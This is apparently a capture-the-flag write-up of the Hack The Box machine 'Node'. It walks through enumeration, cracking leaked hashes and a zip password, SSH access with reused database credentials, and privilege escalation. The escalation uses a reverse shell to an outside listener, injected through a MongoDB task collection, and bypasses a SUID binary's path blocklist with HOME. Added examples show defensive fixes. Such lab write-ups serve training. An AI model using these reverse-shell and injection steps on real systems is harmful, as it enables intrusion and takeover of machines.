Welcome to the Node writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Node
tags: HTB, Medium, Linux, OSCP
Platform: Hackthebox
Difficulty: Medium
OS: Linux
Enumeration
Nmap
To get started, we run a quick scan for open ports.
# nmap -p- -T4 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:26 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 92.74 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 22,3000 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:27 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 93.86 ms 10.10.14.1
2 93.88 ms 10.10.10.58
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds
Port 3000
On port 3000 we can find a web server and, by analyzing the source code of the website, we can find several JavaScript resources.
Inside the admin.js file we can see that it is making a GET request to the URL /api/admin/backup.
var controllers = angular.module('controllers');
controllers.controller('AdminCtrl', function ($scope, $http, $location, $window) {
  $scope.backup = function () {
    $window.open('/api/admin/backup', '_self');
  }
  $http.get('/api/session')
    .then(function (res) {
      if (res.data.authenticated) {
        $scope.user = res.data.user;
      }
      else {
        $location.path('/login');
      }
    });
});
When accessing the URL we can find 3 user accounts with their respective hashes.
Using the website crackstation we can get the passwords for tom and mark in plain text.
tom:spongebob
mark:snowflake
rastating:Can’t decrypt it
On the other hand, inside the profile.js file we can find the URL api/users.
var controllers = angular.module('controllers');
controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
  $http.get('/api/users/' + $routeParams.username)
    .then(function (res) {
      $scope.user = res.data;
    }, function (res) {
      $scope.hasError = true;
      if (res.status == 404) {
        $scope.errorMessage = 'This user does not exist';
      }
      else {
        $scope.errorMessage = 'An unexpected error occurred';
      }
    });
});
And by accessing the URL api/users we can obtain the 3 previous accounts and a new one, that of the user myP14ceAdm1nAcc0uNT, with its hash. This user is also an administrator, as we can see in the parameter is_admin: true.
And again we can get the password in plain text using the crackstation service.
myP14ceAdm1nAcc0uNT:manchester
Now that we have a user with administrator permissions, we are going to authenticate on the website.
As we can see, we can download a Backup file.
Let's see its content.
# cat myplace.backup | base64 -d > myplace
# file myplace
myplace: Zip archive data, at least v1.0 to extract
# mv myplace myplace.zip
Exploitation
Fcrackzip
The zip file is password protected, but we can try to get the password using fcrackzip.
# fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.zip
possible pw found: magicword ()
Great, now we can extract the content.
# unzip myplace.zip
Archive: myplace.zip
[myplace.zip] var/www/myplace/package-lock.json password:
inflating: var/www/myplace/package-lock.json
creating: var/www/myplace/node_modules/
creating: var/www/myplace/node_modules/serve-static/
inflating: var/www/myplace/node_modules/serve-static/README.md
[...]
The extracted content is a copy of the web application. Analyzing its files, in the first lines of app.js we can find the mongodb credentials of the user mark.
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
Maybe they will help us to connect by SSH.
SSH
And we are inside via SSH with the credentials mark:5AYRft73VtFpc84k that we found!
Post exploitation
SUID
Let's see what we have with the SUID bit set.
mark@node:~$ find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount
The /usr/local/bin/backup binary has the SUID bit set, but we cannot execute it as mark.
Running process
Let's see what processes tom has running.
mark@node:~$ ps -ef | grep tom
mark 612 596 0 07:43 pts/0 00:00:00 grep --color=auto tom
tom 1229 1 0 Mar25 ? 00:00:07 /usr/bin/node /var/scheduler/app.js
tom 1232 1 0 Mar25 ? 00:00:07 /usr/bin/node /var/www/myplace/app.js
tom 18349 1229 0 Mar25 ? 00:00:00 /bin/sh -c /bin/bash /tmp/shell.sh
tom 18350 18349 0 Mar25 ? 00:00:00 /bin/bash /tmp/shell.sh
tom 18351 18350 0 Mar25 ? 00:00:00 sh -i
tom 18356 18351 0 Mar25 ? 00:00:00 /bin/bash
tom 18358 18356 0 Mar25 ? 00:00:00 python3 -c import pty; pty.spawn('/bin/bash')
tom 18359 18358 0 Mar25 pts/2 00:00:00 /bin/bash
tom is running another Node application, /var/scheduler/app.js. Let's see its content.
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }
  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);
});
As we can see in the code, there is a function that lists all the documents in the tasks collection of the scheduler database in mongodb, passes the cmd field of each one to exec(), and then deletes the document. It runs inside a setInterval with a delay of 30000, so the whole process is repeated every 30 seconds.
We should be able to connect to the database and insert a new record with a command to run a reverse shell that we have saved in a script.
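The root cause here is that anyone who can write to the tasks collection chooses the command line that runs as tom. As an added example (not code from the box or from this writeup's author), this is one way such a scheduler could dispatch tasks through an allow-list and execFile instead of exec(doc.cmd); the TASKS table, the task and params field names and the site-backup helper are hypothetical.

```javascript
// Added example: allow-listed task dispatch for a scheduler like /var/scheduler/app.js.
// TASKS, its entries and the "task"/"params" document fields are hypothetical.
const { execFile } = require('child_process');

// Fixed programs and argument builders; nothing from the database reaches a shell.
const TASKS = {
  'rotate-logs': { file: '/usr/sbin/logrotate', args: () => ['/etc/logrotate.conf'] },
  'backup-site': {
    file: '/usr/local/bin/site-backup', // hypothetical helper
    args: (p) => ['--site', p.site],
    check: (p) => typeof p.site === 'string' && /^[a-z0-9-]{1,32}$/.test(p.site),
  },
};

// Turn a task document into { file, args }, or null if it must not run.
function resolveTask(doc) {
  if (!doc || typeof doc !== 'object') return null;
  if ('cmd' in doc) return null; // free-form command strings are never accepted
  if (typeof doc.task !== 'string') return null;
  if (!Object.prototype.hasOwnProperty.call(TASKS, doc.task)) return null;
  const spec = TASKS[doc.task];
  const params = doc.params || {};
  if (spec.check && !spec.check(params)) return null;
  return { file: spec.file, args: spec.args(params) };
}

// Run one document: execFile passes argv directly, so /bin/sh never parses it.
function runTask(doc, log = console.log) {
  const job = resolveTask(doc);
  if (!job) { log('rejected task ' + JSON.stringify(doc)); return false; }
  execFile(job.file, job.args, { timeout: 10000 }, (err) => {
    if (err) log('task failed: ' + err.message);
  });
  return true;
}

// Constructed sample documents, as they might sit in the tasks collection.
const samples = [
  { task: 'backup-site', params: { site: 'myplace' } },
  { cmd: '/bin/bash /tmp/shell.sh' },
  { task: 'backup-site', params: { site: 'x; id' } },
  { task: '__proto__' },
];
const verdicts = samples.map((d) => resolveTask(d) !== null);
console.log(verdicts);
```

Rejected documents are also worth logging and alerting on, since a cmd field appearing in this collection means someone with database access is probing the scheduler.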
Privilege escalation
Well, the first thing we need to do is put a terminal to listen and create the script with the reverse shell inside.
mark@node:/tmp$ cat shell.sh
sh -i >& /dev/tcp/10.10.14.7/8787 0>&1
Now, we have to connect to the scheduler database and insert a new record that executes our script. Inserting {cmd:"/bin/bash /tmp/shell.sh"} should work.
mark@node:/home/tom$ mongo localhost:27017/scheduler -u mark -p 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: localhost:27017/scheduler
> sh -i >& /dev/tcp/10.10.14.7/8787 0>&1
2021-03-25T19:45:26.389+0000 E QUERY [thread1] SyntaxError: expected expression, got '&' @(shell):1:7
> db.tasks.find()
> db.tasks.insert({cmd:"/bin/bash /tmp/shell.sh"});
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("605ce5e877be912640c6765d"), "cmd" : "/bin/bash /tmp/shell.sh" }
>
We just have to wait a few seconds... and we have a shell!
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.58] 32886
sh: 0: can't access tty; job control turned off
$
Perfect, now we can read the user flag inside the tom home.
tom@node:~$ cat user.txt
CENSORED_FLAG
Root flag
Now that we are tom, we can run the SUID backup binary we found earlier.
As we can see in the app.js file downloaded in the backup of the website, the execution syntax of the binary is /usr/local/bin/backup followed by -q, the key and the path to back up.
app.get('/api/admin/backup', function (req, res) {
  if (req.session.user && req.session.user.is_admin) {
    var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
    var backup = '';
    proc.on("exit", function(exitCode) {
      res.header("Content-Type", "text/plain");
      res.header("Content-Disposition", "attachment; filename=myplace.backup");
      res.send(backup);
    });
    proc.stdout.on("data", function(chunk) {
      backup += chunk;
    });
    proc.stdout.on("end", function() {
    });
  }
  else {
    res.send({
      authenticated: false
    });
  }
});
Well, we are going to ask it to make a backup of the root directory. We must remember that the result will be a zip file encoded in base64.
tom@node:~$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "/root"
[+] Finished! Encoded backup is below:
Let's decode it.
# echo "<base64 output from above>" | base64 -d > root.zip
In this case, unzip is not working so we are going to use 7za. The password to unzip is magicword, which is the same one we cracked earlier.
# 7za x root.zip
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed):
Everything is Ok
Size: 2584
Compressed: 1141
When unzipping it, we obtain the file root.txt, so we are going to read the flag.
# cat root.txt
[ASCII art omitted]
Wow, we've been trolled!
Let's analyze the flow of the program with ltrace.
tom@node:/$ ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
__libc_start_main(0x80489fd, 4, 0xffea6174, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("-q", "-q") = 0
strncpy(0xffea6038, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xffea6038
strcpy(0xffea6021, "/") = 0xffea6021
strcpy(0xffea602d, "/") = 0xffea602d
strcpy(0xffea5fb7, "/e") = 0xffea5fb7
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x95e7008
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x95e7008) = 0xffea5bcf
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x95e7008) = 0xffea5bcf
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x95e7008) = 0xffea5bcf
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x95e7008) = 0xffea5bcf
strcspn("\n", "\n") = 0
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "") = 1
fgets(nil, 1000, 0x95e7008) = 0
strstr("/root", "..") = nil
strstr("/root", "/root") = "/root"
strcpy(0xffea4c08, "Finished! Encoded backup is belo"...) = 0xffea4c08
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Finished! Encoded backup is belo"... [+] Finished! Encoded backup is below:
) = 51
puts("UEsDBDMDAQBjAG++IksAAAAA7QMAABgK"...
) = 1525
exit(0 <no return ...>
+++ exited (status 0) +++
tom@node:/$
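So the binary checks whether the requested path contains /root, as we can see here: strstr("/root", "/root"). No problem: we can get around it by setting the HOME environment variable of tom to /root, and then we can ask the binary to back up the tom home with "~". Because the tilde is quoted, our own shell does not expand it, so the argument the binary checks is the literal ~ and no longer contains /root.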
tom@node:/$ export HOME=/root
tom@node:/$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "~"
We decode the result from base64 back to zip and unzip it.
# echo "<base64 output from above>" | base64 -d > root.zip
# 7za x root.zip
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 3858 bytes (4 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 3858
Enter password (will not be echoed):
Everything is Ok
Folders: 3
Files: 7
Size: 4268
Compressed: 3858
And again, let's read the root flag!
# ls
root root.zip
# cd root
# ls
root.txt
# cat root.txt
CENSORED_FLAG
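The HOME trick works because the binary applies a substring blocklist to the raw argument rather than to the path that is finally archived. As an added example (not the binary's code and not from the original writeup), the following models the two strstr checks visible in the ltrace output next to an allow-list check made on the resolved path; the function names and the sandbox directories are hypothetical and constructed for the demonstration.

```javascript
// Added example: substring blocklist on the raw argument vs. allow-list on the
// resolved path. Function names and the sandbox layout are hypothetical.
const fs = require('fs');
const os = require('os');
const path = require('path');

// Model of the traced logic: refuse only if the raw argument contains ".." or "/root".
function blocklistAllows(arg) {
  return !arg.includes('..') && !arg.includes('/root');
}

// Hardened: absolute path only, resolve symlinks, then require containment
// in one of the allow-listed roots.
function allowlistAllows(arg, allowedRoots) {
  if (typeof arg !== 'string' || !path.isAbsolute(arg)) return false; // "~", relative paths
  let real;
  try { real = fs.realpathSync(arg); } catch (e) { return false; }    // must exist
  return allowedRoots.some((root) => {
    const base = fs.realpathSync(root);
    return real === base || real.startsWith(base + path.sep);
  });
}

// Constructed sandbox: <tmp>/www is the allowed root, <tmp>/secret stands in for /root.
function demo() {
  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'backup-check-'));
  const www = path.join(tmp, 'www');
  const secret = path.join(tmp, 'secret');
  fs.mkdirSync(www);
  fs.mkdirSync(secret);
  fs.symlinkSync(secret, path.join(www, 'link')); // symlink that leaves the allowed root
  const cases = ['~', path.join(www, 'link'), www];
  const result = cases.map((arg) => allowlistAllows(arg, [www]));
  fs.rmSync(tmp, { recursive: true, force: true });
  return result;
}

console.log(blocklistAllows('/root'), blocklistAllows('~')); // blocklist view
console.log(demo());                                         // allow-list view
```

The blocklist accepts the literal tilde, while the allow-list refuses it along with the symlink that points outside the permitted directory.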